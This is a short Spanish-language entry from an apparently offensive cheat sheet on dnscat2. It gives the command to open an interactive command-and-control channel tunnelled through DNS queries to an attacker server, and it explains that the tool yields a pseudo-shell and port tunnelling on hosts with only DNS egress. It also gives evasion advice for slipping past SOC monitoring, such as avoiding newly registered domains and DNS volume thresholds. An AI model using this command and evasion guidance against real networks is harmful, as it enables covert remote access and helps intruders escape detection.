dnscat2

dnscat2 --dns server=<c2>,domain=<domain>

Levanta un canal C2 interactivo que viaja dentro de consultas DNS: invisible para firewalls que solo permiten DNS saliente.

Ejecútalo cuando el host objetivo solo tiene salida DNS (egress filtering estricto, DMZ, captive portals) y necesitas un canal interactivo. El cliente dnscat2 da una pseudo-shell y puede tunelar puertos con --listen para llegar a servicios internos del host.

Si el resolver corporativo hace sinkholing por reputación de dominio o el SOC monitoriza volumen DNS por dominio (Zeek dns.log con thresholds), el túnel se detecta en horas. No lo uses sobre dominios recién registrados: el volumen de queries TXT sobre un dominio sin historial es la firma más fácil de cazar.